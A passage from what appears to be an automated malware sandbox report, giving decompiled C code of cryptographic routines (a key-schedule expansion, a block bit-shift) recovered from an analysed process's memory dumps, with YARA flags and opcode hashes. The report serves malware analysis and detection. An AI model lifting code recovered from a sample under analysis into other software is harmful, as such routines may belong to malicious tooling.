				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}
















                                                                                                                                                    0x00402d93
                                                                                                                                                    0x00402d98
                                                                                                                                                    0x00402da0
                                                                                                                                                    0x00402da9
                                                                                                                                                    0x00402db3
                                                                                                                                                    0x00402dba
                                                                                                                                                    0x00402dc3
                                                                                                                                                    0x00402dce
                                                                                                                                                    0x00402dd6
                                                                                                                                                    0x00402ddf
                                                                                                                                                    0x00402dea
                                                                                                                                                    0x00402df0
                                                                                                                                                    0x00402df5
                                                                                                                                                    0x00402dfe
                                                                                                                                                    0x00402e09
                                                                                                                                                    0x00402e11
                                                                                                                                                    0x00402e1a
                                                                                                                                                    0x00402e25
                                                                                                                                                    0x00402e2d
                                                                                                                                                    0x00402e36
                                                                                                                                                    0x00402e41
                                                                                                                                                    0x00402e49
                                                                                                                                                    0x00402e52
                                                                                                                                                    0x00402e5d
                                                                                                                                                    0x00402e65
                                                                                                                                                    0x00402e6e
                                                                                                                                                    0x00402e80
                                                                                                                                                    0x00402e83
                                                                                                                                                    0x00402f9f
                                                                                                                                                    0x00402fa4
                                                                                                                                                    0x00402e89
                                                                                                                                                    0x00402e89
                                                                                                                                                    0x00402e8c
                                                                                                                                                    0x00402e8e
                                                                                                                                                    0x00402e91
                                                                                                                                                    0x00402e91
                                                                                                                                                    0x00402ef6
                                                                                                                                                    0x00402efb
                                                                                                                                                    0x00402efd
                                                                                                                                                    0x00402f03
                                                                                                                                                    0x00402f05
                                                                                                                                                    0x00402f0b
                                                                                                                                                    0x00402f0d
                                                                                                                                                    0x00402f10
                                                                                                                                                    0x00402f16
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402f72
                                                                                                                                                    0x00402f78
                                                                                                                                                    0x00402f7a
                                                                                                                                                    0x00402f80
                                                                                                                                                    0x00402f82
                                                                                                                                                    0x00402f87
                                                                                                                                                    0x00402f88
                                                                                                                                                    0x00402f8b
                                                                                                                                                    0x00402f8e
                                                                                                                                                    0x00402f91
                                                                                                                                                    0x00402f97
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402f97
                                                                                                                                                    0x00402fae
                                                                                                                                                    0x00402fae
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                                                    • Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
                                                                                                                                                    • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                                                    • Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00402D87, Relevance: .2, Instructions: 161COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 63%
                                                                                                                                                    			E00402D87(intOrPtr __eax, intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t67;
				signed int* _t72;
				signed int* _t85;
				signed int _t98;
				signed int _t100;
				signed int _t110;
				signed int _t112;
				signed int* _t114;
				signed int _t131;
				signed int _t133;
				signed int _t137;
				signed int _t158;
				intOrPtr _t180;

				asm("lahf");
				asm("lock sahf");
				 *0x4b43394 = __eax;
				asm("enter 0x8b55, 0xec");
				_t85 = _a12;
				_t114 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t114 =  *_t85 & 0xff00ff00 |  *_t85 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t114[1] = _t85[1] & 0xff00ff00 | _t85[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t114[2] = _t85[2] & 0xff00ff00 | _t85[2] & 0x00ff00ff;
				_t67 =  &(_t114[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t114[3] = _t85[3] & 0xff00ff00 | _t85[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t114[4] = _t85[4] & 0xff00ff00 | _t85[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t114[5] = _t85[5] & 0xff00ff00 | _t85[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t114[6] = _t85[6] & 0xff00ff00 | _t85[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t114[7] = _t85[7] & 0xff00ff00 | _t85[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L5:
					return _t67 | 0xffffffff;
				} else {
					_t180 = _a4;
					_t72 = 0;
					_a12 = 0;
					while(1) {
						_t158 =  *(_t67 + 0x18);
						_t98 = ( *(_t180 + 4 + (_t158 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t180 +  &(_t72[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t180 + 4 + (_t158 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t180 + 5 + (_t158 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t180 + 4 + (_t158 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t67 - 4);
						_t131 =  *_t67 ^ _t98;
						 *(_t67 + 0x1c) = _t98;
						_t100 =  *(_t67 + 4) ^ _t131;
						 *(_t67 + 0x20) = _t131;
						_t133 =  *(_t67 + 8) ^ _t100;
						 *(_t67 + 0x24) = _t100;
						 *(_t67 + 0x28) = _t133;
						if(_t72 == 6) {
							break;
						}
						_t110 = ( *(_t180 + 4 + (_t133 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t180 + 4 + (_t133 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t180 + 4 + (_t133 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t180 + 5 + (_t133 & 0x000000ff) * 4) & 0x000000ff ^  *(_t67 + 0xc);
						_t137 =  *(_t67 + 0x10) ^ _t110;
						 *(_t67 + 0x2c) = _t110;
						_t112 =  *(_t67 + 0x14) ^ _t137;
						 *(_t67 + 0x34) = _t112;
						_t72 =  &(_a12[0]);
						 *(_t67 + 0x30) = _t137;
						 *(_t67 + 0x38) = _t112 ^ _t158;
						_t67 = _t67 + 0x20;
						_a12 = _t72;
						if(_t72 < 7) {
							continue;
						} else {
							goto L5;
						}
						goto L7;
					}
					return 0xe;
				}
				L7:
			}
















                                                                                                                                                    0x00402d87
                                                                                                                                                    0x00402d88
                                                                                                                                                    0x00402d8a
                                                                                                                                                    0x00402d8f
                                                                                                                                                    0x00402d93
                                                                                                                                                    0x00402d98
                                                                                                                                                    0x00402da0
                                                                                                                                                    0x00402da9
                                                                                                                                                    0x00402db3
                                                                                                                                                    0x00402dba
                                                                                                                                                    0x00402dc3
                                                                                                                                                    0x00402dce
                                                                                                                                                    0x00402dd6
                                                                                                                                                    0x00402ddf
                                                                                                                                                    0x00402dea
                                                                                                                                                    0x00402df0
                                                                                                                                                    0x00402df5
                                                                                                                                                    0x00402dfe
                                                                                                                                                    0x00402e09
                                                                                                                                                    0x00402e11
                                                                                                                                                    0x00402e1a
                                                                                                                                                    0x00402e25
                                                                                                                                                    0x00402e2d
                                                                                                                                                    0x00402e36
                                                                                                                                                    0x00402e41
                                                                                                                                                    0x00402e49
                                                                                                                                                    0x00402e52
                                                                                                                                                    0x00402e5d
                                                                                                                                                    0x00402e65
                                                                                                                                                    0x00402e6e
                                                                                                                                                    0x00402e80
                                                                                                                                                    0x00402e83
                                                                                                                                                    0x00402f9d
                                                                                                                                                    0x00402fa4
                                                                                                                                                    0x00402e89
                                                                                                                                                    0x00402e89
                                                                                                                                                    0x00402e8c
                                                                                                                                                    0x00402e8e
                                                                                                                                                    0x00402e91
                                                                                                                                                    0x00402e91
                                                                                                                                                    0x00402ef6
                                                                                                                                                    0x00402efb
                                                                                                                                                    0x00402efd
                                                                                                                                                    0x00402f03
                                                                                                                                                    0x00402f05
                                                                                                                                                    0x00402f0b
                                                                                                                                                    0x00402f0d
                                                                                                                                                    0x00402f10
                                                                                                                                                    0x00402f16
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402f72
                                                                                                                                                    0x00402f78
                                                                                                                                                    0x00402f7a
                                                                                                                                                    0x00402f80
                                                                                                                                                    0x00402f82
                                                                                                                                                    0x00402f87
                                                                                                                                                    0x00402f88
                                                                                                                                                    0x00402f8b
                                                                                                                                                    0x00402f8e
                                                                                                                                                    0x00402f91
                                                                                                                                                    0x00402f97
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402f97
                                                                                                                                                    0x00402fae
                                                                                                                                                    0x00402fae
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b77524f73f5b9725c8b0c48ab09b6d7829959503bc25e6c4dad20ad73f39825c
                                                                                                                                                    • Instruction ID: 0fc73d52f4632706d1a62dacb6e6cef9c5f73211cbf1d7611aeb4f59dec370e7
                                                                                                                                                    • Opcode Fuzzy Hash: b77524f73f5b9725c8b0c48ab09b6d7829959503bc25e6c4dad20ad73f39825c
                                                                                                                                                    • Instruction Fuzzy Hash: 265171B3E14A214BD318CF09CD40631B692FFD8312B5B81BEDD199B397CA74A9529A90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C74680, Relevance: .1, Instructions: 140COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c5218c2c5f4ec00761a8d98bd9cd92bdf86b610b9cee489442477253928efef8
                                                                                                                                                    • Instruction ID: ca6f69f0b3ed1cf736fbb6ba242ea624eea2035fdcf02bdc13be368b69647999
                                                                                                                                                    • Opcode Fuzzy Hash: c5218c2c5f4ec00761a8d98bd9cd92bdf86b610b9cee489442477253928efef8
                                                                                                                                                    • Instruction Fuzzy Hash: 164112712046659FD72C8F22C8A9F7733E9EB06351F14841EF99B8B591DB30A941E720
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00401030, Relevance: .1, Instructions: 108COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00401030(signed char* __eax) {
				signed char* _t37;
				unsigned int _t65;
				unsigned int _t73;
				unsigned int _t81;
				unsigned int _t88;
				signed char _t94;
				signed char _t97;
				signed char _t100;

				_t37 = __eax;
				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t94 = __eax[0xb];
				if((_t94 & 0x00000001) != 0) {
					_t65 = _t65 | 0x80000000;
				}
				_t37[0xc] = _t65 >> 0x18;
				_t37[0xf] = _t65;
				_t37[0xd] = _t65 >> 0x10;
				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
				_t97 = _t37[7];
				_t37[0xe] = _t65 >> 8;
				if((_t97 & 0x00000001) != 0) {
					_t73 = _t73 | 0x80000000;
				}
				_t37[8] = _t73 >> 0x18;
				_t37[0xb] = _t73;
				_t37[9] = _t73 >> 0x10;
				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
				_t100 = _t37[3];
				_t37[0xa] = _t73 >> 8;
				if((_t100 & 0x00000001) != 0) {
					_t81 = _t81 | 0x80000000;
				}
				_t37[4] = _t81 >> 0x18;
				_t37[7] = _t81;
				_t37[5] = _t81 >> 0x10;
				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
				 *_t37 = _t88 >> 0x18;
				_t37[1] = _t88 >> 0x10;
				_t37[6] = _t81 >> 8;
				_t37[2] = _t88 >> 8;
				_t37[3] = _t88;
				return _t37;
			}











                                                                                                                                                    0x00401030
                                                                                                                                                    0x0040105b
                                                                                                                                                    0x0040105d
                                                                                                                                                    0x00401063
                                                                                                                                                    0x00401065
                                                                                                                                                    0x00401065
                                                                                                                                                    0x00401071
                                                                                                                                                    0x00401076
                                                                                                                                                    0x0040107c
                                                                                                                                                    0x004010ac
                                                                                                                                                    0x004010ae
                                                                                                                                                    0x004010b4
                                                                                                                                                    0x004010ba
                                                                                                                                                    0x004010bc
                                                                                                                                                    0x004010bc
                                                                                                                                                    0x004010cb
                                                                                                                                                    0x004010d0
                                                                                                                                                    0x004010d6
                                                                                                                                                    0x00401101
                                                                                                                                                    0x00401103
                                                                                                                                                    0x00401109
                                                                                                                                                    0x0040110f
                                                                                                                                                    0x00401111
                                                                                                                                                    0x00401111
                                                                                                                                                    0x00401120
                                                                                                                                                    0x00401128
                                                                                                                                                    0x0040112b
                                                                                                                                                    0x0040114f
                                                                                                                                                    0x00401156
                                                                                                                                                    0x0040115d
                                                                                                                                                    0x00401169
                                                                                                                                                    0x0040116c
                                                                                                                                                    0x0040116f
                                                                                                                                                    0x00401173

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                                                    • Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
                                                                                                                                                    • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                                                    • Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C726F8, Relevance: .0, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                                                                    • Instruction ID: d15a80ac3b02d16992dd1f111c328089c3d9e72c5b2ba8512269c2ef418b22b0
                                                                                                                                                    • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                                                                    • Instruction Fuzzy Hash: 9AF0C231324559ABDB5CEA18DE91A6A33D5EB94340F64C079ED5DC7251E631DF408290
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C500EA, Relevance: .0, Instructions: 20COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2dd6100c5a868bce8079481a17e28f418926f3a136d9af693da5e4b36cd35e82
                                                                                                                                                    • Instruction ID: 2f919227d1cda467263c9defd713387e7cae624df787944073078084a1c825f2
                                                                                                                                                    • Opcode Fuzzy Hash: 2dd6100c5a868bce8079481a17e28f418926f3a136d9af693da5e4b36cd35e82
                                                                                                                                                    • Instruction Fuzzy Hash: 11E09AB5544B81CBD310DF14C900B1AB3F4FF89B10F20083AF805C7790D7789A09CA56
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C5F8CC, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                                                                    • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                                                                                                                    • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                                                                    • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C610D0, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                                                                    • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                                                                                                                    • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                                                                    • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C60060, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                                                                    • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                                                                                                                    • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                                                                    • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C601D4, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                                                                                                    • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                                                                                                                    • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                                                                                                    • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C61148, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
